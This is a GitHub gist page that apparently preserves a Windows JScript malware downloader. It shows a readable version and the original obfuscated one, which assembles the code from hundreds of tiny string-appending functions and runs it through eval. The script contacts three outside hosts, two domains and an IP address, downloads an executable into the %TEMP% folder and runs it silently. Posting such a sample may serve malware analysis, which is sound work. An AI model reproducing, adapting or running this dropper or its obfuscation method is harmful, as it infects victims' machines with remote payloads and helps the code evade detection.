Last active
October 19, 2015 13:59
-
-
Save jbonhag/692ccc77175b60c2f7ec to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function dl(fr) { | |
| var b = "alejandronaranjo.com tripenjoy.com 76.233.231.58".split(" "); | |
| for (var i = 0; i < b.length; i++) { | |
| var ws = WScript.CreateObject("WScript.Shell"); | |
| var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe"; | |
| var dn = 0; | |
| var xo = WScript.CreateObject("MSXML2.XMLHTTP"); | |
| xo.onreadystatechange = function() { | |
| if (xo.readyState == 4 && xo.status == 200) { | |
| var xa = WScript.CreateObject("ADODB.Stream"); | |
| xa.open(); | |
| xa.type = 1; | |
| xa.write(xo.ResponseBody); | |
| if (xa.size > 1000) { | |
| dn = 1; | |
| xa.position = 0; | |
| xa.saveToFile(fn, 2); | |
| try { | |
| ws.Run(fn, 1, 0); | |
| } catch (er) {}; | |
| }; | |
| xa.close(); | |
| }; | |
| }; | |
| try { | |
| xo.open("GET", "http://" + b[i] + "/counter/?id=" + str + "&rnd=" + fr, false); | |
| xo.send(); | |
| } catch (er) {}; | |
| if (dn == 1) break; | |
| }; | |
| }; | |
| dl(2251); | |
| dl(7672); | |
| dl(6753); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var str="5551525E0E060B0A0C05032417070549070B16144A070B095E275E0F0508114A070B4A0E145E17555E55505051555255505450"; function mhsz() { xrn += 'al'; }; function qjac() { zcw += 'end('; }; function rxnz() { zcw += 'an'; }; function ftkg() { zcw += 'dn = '; }; function zxo() { zcw += ' i++'; }; function ztws() { zcw += '("GET'; }; function vazv() { zcw += '00)'; }; function pjgz() { zcw += '[i]+'; }; function brvd() { zcw += 'nvir'; }; function ouji() { mjq(zcw); }; function zkjb() { zcw += ' xo.o'; }; function ykk() { zcw += ',2)'; }; function ojy() { zcw += 'on'; }; function agje() { zcw += 'or '; }; function jsw() { zcw += '.Shel'; }; function ndbz() { zcw += 'func'; }; function ezm() { zcw += '} cat'; }; function qbj() { zcw += '.wri'; }; function fwf() { zcw += 'ript.'; }; function tya() { zcw += 'd(Mat'; }; function mqh() { zcw += '.Exp'; }; function qchm() { zcw += ' dn '; }; function iysr() { zcw += ' (xo'; }; function ciu() { zcw += '","ht'; }; function ryw() { zcw += 's("'; }; function rmpo() { zcw += '= '; }; function ddl() { zcw += 'yStat'; }; function ymv() { zcw += 'ge ='; }; function cjgg() { zcw += '%")'; }; function ewtm() { zcw += 'nc'; }; function lbnz() { zcw += 'a.ty'; }; function zhp() { zcw += '675'; }; function bhpy() { zcw += 'fr) {'; }; function xuy() { zcw += '; if'; }; function axor() { zcw += 'gt'; }; function lhfh() { zcw += 'ript'; }; function twd() { zcw += 'om()*'; }; function cuc() { zcw += '+st'; }; function zyjz() { zcw += 'th.'; }; function hecz() { zcw += '.save'; }; function kdj() { zcw += '; t'; }; function ltd() { zcw += '00)'; }; function ynp() { zcw += '3);'; }; function ghl() { zcw += '.op'; }; function nnpm() { zcw += 'om '; }; function bjoh() { zcw += 'ct'; }; function uvh() { zcw += '= 0;'; }; function iyqy() { zcw += 'ak; '; }; function apxt() { zcw += '= '; }; function gnv() { zcw += '; '; }; function bjde() { zcw += '} ca'; }; function kdrn() { zcw += 'i=0; '; }; function opdm() { zcw += '};'; }; function zgiu() { zcw += '(va'; }; function ncuq() { zcw += 'posit'; }; function sum() { zcw += 'ch'; }; function stt() { zcw += 'ate'; }; function euig() { zcw += '.r'; }; function nmft() { zcw += 'io'; }; function uzp() { xrn += 'ev'; }; function zhq() { zcw += 'b = '; }; function fqfb() { zcw += '.on'; }; function hye() { zcw += 'ry {'; }; function rfqp() { zcw += ' xo'; }; function srx() { zcw += ' == 2'; }; function ijq() { zcw += '%TEMP'; }; function vszn() { zcw += 'ranjo'; }; function wffv() { zcw += ' {}; '; }; function scbx() { zcw += 'ToFil'; }; function qvy() { zcw += 'rea'; }; function rdzb() { zcw += '; t'; }; function tzs() { zcw += 'cri'; }; function fvey() { zcw += '76.'; }; function xnq() { zcw += '&&'; }; function twrb() { zcw += ' xa'; }; function vyfo() { zcw += 'ead'; }; function oto() { zcw += 'tripe'; }; function hgu() { zcw += 'te(xo'; }; function ozt() { zcw += 'dy'; }; function jer() { zcw += '("M'; }; function nqgt() { zcw += 'ript'; }; function wtab() { zcw += 'tio'; }; function rdp() { zcw += '.Cre'; }; function znua() { zcw += 'ount'; }; function mwte() { zcw += '; f'; }; function yoqq() { zcw += 'm '; }; function dax() { zcw += 'tus'; }; function vqfk() { zcw += '); '; }; function dib() { zcw += 'h;'; }; function oycj() { zcw += 'ar'; }; function brgs() { zcw += 'si'; }; function zegv() { zcw += 'andE'; }; var mjq = ''; function qpf() { zcw += ') bre'; }; function tvxq() { zcw += 't("'; }; function kclx() { zcw += '); '; }; function wvy() { zcw += ' fu'; }; function qfwx() { zcw += 'e(fn'; }; var ejbr = ''; function cjb() { zcw += '"alej'; }; function vljo() { zcw += 'en'; }; var xrn = ''; function dxk() { zcw += 'en()'; }; function caey() { zcw += ' var '; }; function qbeo() { zcw += '2251'; }; function ezom() { zcw += ' xo'; }; function ljn() { zcw += 'Bo'; }; function tjs() { zcw += 'ring'; }; function aquc() { zcw += 'es'; }; function iucq() { zcw += 't("'; }; function ezbp() { zcw += '/"+b'; }; function nkt() { zcw += 'm"'; }; function oxj() { zcw += 'tch'; }; function gsxx() { zcw += 'ry {'; }; function zlvv() { zcw += ' var '; }; function hiht() { zcw += '{}'; }; function lfq() { zcw += ' va'; }; function tsp() { zcw += '.XML'; }; function jgq() { zcw += 'oy'; }; function scx() { zcw += 'eObje'; }; function zqt() { ejbr = this; }; function cmeq() { zcw += ');'; }; function sbdc() { zcw += '= WS'; }; function vjgw() { zcw += ' (dn'; }; function njrn() { zcw += '+".e'; }; function hwh() { zcw += 'po'; }; function tknb() { zcw += '.R'; }; function iajx() { zcw += 'rnd="'; }; function min() { zcw += 'nj'; }; function jliz() { zcw += ' ='; }; function jby() { zcw += '); xo'; }; function aofv() { zcw += ') { v'; }; function bmmt() { zcw += ' ws '; }; function dink() { zcw += 'tSt'; }; function ucp() { zcw += 'fromC'; }; function nhx() { zcw += '+fr, '; }; function tjem() { zcw += '(76'; }; function lbsp() { zcw += '; xa'; }; var zcw = ''; function eby() { zcw += 'de('; }; function zqzi() { zcw += 'ject'; }; function dfnl() { zcw += '31.5'; }; function cwmz() { zcw += '.c'; }; function gor() { zcw += 'l"); '; }; function gzcm() { zcw += '.sta'; }; function yxz() { zcw += 'r '; }; function uyib() { zcw += 'B.St'; }; function rjb() { zcw += 'xa'; }; function xat() { zcw += '4 '; }; function woug() { zcw += '); dl'; }; function qmwi() { zcw += 'r+"&'; }; function umpz() { zcw += 'Creat'; }; function xlj() { zcw += 'harCo'; }; function vqgs() { zcw += 'xe"; '; }; function zwft() { zcw += 'pli'; }; function drv() { zcw += '000'; }; function pck() { zcw += '); '; }; function ttds() { zcw += '8".s'; }; function lpj() { zcw += ' ws.'; }; function tuw() { zcw += 'pt'; }; function loxa() { zcw += ' { if'; }; function blp() { zcw += 'tp:/'; }; function wmi() { zcw += 'xa '; }; function jutg() { zcw += 'd="'; }; function wmb() { zcw += '= ws'; }; function ukw() { zcw += 'ADOD'; }; function azna() { zcw += ' dl('; }; function kxmm() { zcw += 'HT'; }; function dnb() { zcw += 'dl('; }; function obr() { zcw += 'L2'; }; function dhsm() { zcw += 'onmen'; }; function cavu() { zcw += '.s'; }; function jfqw() { zcw += 'r fn '; }; function uubz() { zcw += 'dy);'; }; function cbt() { zcw += 'roun'; }; function dkub() { zcw += 'nse'; }; function gtm() { zcw += '+Ma'; }; function uucy() { zcw += '(xa.'; }; function kezi() { zcw += 'WSc'; }; function dfmi() { zcw += 'i<b.l'; }; function eant() { zcw += ' == 1'; }; function dgx() { zcw += '> 10'; }; function woe() { zcw += '1000'; }; function nlj() { zcw += 'n '; }; function gwfa() { zcw += ' xa.'; }; function vvxd() { zcw += '72);'; }; function ttr() { zcw += '}; }'; }; function fep() { zcw += ' 1'; }; function hbp() { zcw += 'var'; }; function qpft() { zcw += ' dl('; }; function bkdi() { zcw += 'ti'; }; function crge() { zcw += ' ('; }; function fpnm() { zcw += ' }'; }; function kmvj() { zcw += ' (er)'; }; function bcyw() { zcw += 'h.ra'; }; function cyo() { zcw += '; x'; }; function tbvs() { zcw += 'pen'; }; function vlm() { zcw += 'SXM'; }; function dqc() { zcw += 'teOb'; }; function fdg() { zcw += '92)'; }; function pdq() { zcw += 'WSc'; }; function zjt() { zcw += 'r xo'; }; function url() { zcw += 'er/?i'; }; function uwoz() { zcw += '0;'; }; function nje() { zcw += 'TP"'; }; function skmj() { zcw += 'ech'; }; function vymn() { zcw += 'nd'; }; function vfa() { zcw += '= WSc'; }; function udki() { zcw += 'ring.'; }; function ocbr() { zcw += '00) {'; }; function hlv() { zcw += ' if '; }; function hng() { zcw += 'Objec'; }; function idw() { zcw += 'false'; }; function twi() { zcw += ' = '; }; function cif() { zcw += ' { '; }; function twy() { zcw += '233'; }; function vldl() { zcw += 'e ='; }; function dvge() { zcw += '.2'; }; function iyix() { zcw += '1;'; }; function pum() { zcw += '.C'; }; function zmim() { zcw += '.co'; }; function wrga() { zcw += 'rona'; }; function iuuw() { zcw += '}; xa'; }; function hcip() { zcw += '("'; }; function isp() { zcw += 'rea'; }; function xpf() { zcw += '"/c'; }; function zbh() { zcw += 'n()'; }; function imh() { zcw += ' ")'; }; function tln() { zcw += 'va'; }; function vhoi() { zcw += 'n,1,0'; }; function dpm() { zcw += 'e(); '; }; function gyb() { zcw += '.clos'; }; function rblw() { zcw += 'er) '; }; function anuc() { mjq = ejbr[xrn]; }; function xwu() { zcw += 'and'; }; function jii() { zcw += '+St'; }; function dmo() { zcw += 'rea'; }; function wehk() { zcw += 'Run(f'; }; function tedl() { zcw += 'stat'; }; function gcf() { zcw += 'ze '; }; function quh() { zcw += 'pe'; };ndbz(); bkdi(); ojy(); qpft(); bhpy(); zlvv(); zhq(); cjb(); xwu(); wrga(); vszn(); zmim(); yoqq(); oto(); min(); jgq(); cwmz(); nnpm(); fvey(); twy(); dvge(); dfnl(); ttds(); zwft(); tvxq(); imh(); mwte(); agje(); zgiu(); yxz(); kdrn(); dfmi(); vljo(); axor(); dib(); zxo(); aofv(); oycj(); bmmt(); vfa(); lhfh(); pum(); dmo(); dqc(); zqzi(); hcip(); pdq(); nqgt(); jsw(); gor(); tln(); jfqw(); wmb(); mqh(); zegv(); brvd(); dhsm(); dink(); tjs(); ryw(); ijq(); cjgg(); jii(); udki(); ucp(); xlj(); eby(); fdg(); gtm(); zyjz(); cbt(); tya(); bcyw(); vymn(); twd(); woe(); drv(); vazv(); njrn(); vqgs(); hbp(); qchm(); rmpo(); uwoz(); lfq(); zjt(); twi(); kezi(); fwf(); umpz(); scx(); bjoh(); jer(); vlm(); obr(); tsp(); kxmm(); nje(); jby(); fqfb(); isp(); ozt(); tedl(); skmj(); rxnz(); ymv(); wvy(); ewtm(); wtab(); zbh(); loxa(); iysr(); euig(); vyfo(); ddl(); vldl(); apxt(); xat(); xnq(); rfqp(); gzcm(); dax(); srx(); ocbr(); caey(); wmi(); sbdc(); tzs(); tuw(); rdp(); stt(); hng(); iucq(); ukw(); uyib(); qvy(); nkt(); vqfk(); rjb(); ghl(); dxk(); cyo(); lbnz(); quh(); jliz(); fep(); lbsp(); qbj(); hgu(); tknb(); aquc(); hwh(); dkub(); ljn(); uubz(); hlv(); uucy(); brgs(); gcf(); dgx(); ltd(); cif(); ftkg(); iyix(); gwfa(); ncuq(); nmft(); nlj(); uvh(); twrb(); hecz(); scbx(); qfwx(); ykk(); kdj(); hye(); lpj(); wehk(); vhoi(); pck(); ezm(); sum(); kmvj(); wffv(); iuuw(); gyb(); dpm(); opdm(); fpnm(); rdzb(); gsxx(); zkjb(); tbvs(); ztws(); ciu(); blp(); ezbp(); pjgz(); xpf(); znua(); url(); jutg(); cuc(); qmwi(); iajx(); nhx(); idw(); cmeq(); ezom(); cavu(); qjac(); kclx(); bjde(); oxj(); crge(); rblw(); hiht(); xuy(); vjgw(); eant(); qpf(); iyqy(); ttr(); gnv(); dnb(); qbeo(); woug(); tjem(); vvxd(); azna(); zhp(); ynp(); uzp(); mhsz(); zqt(); anuc(); ouji(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment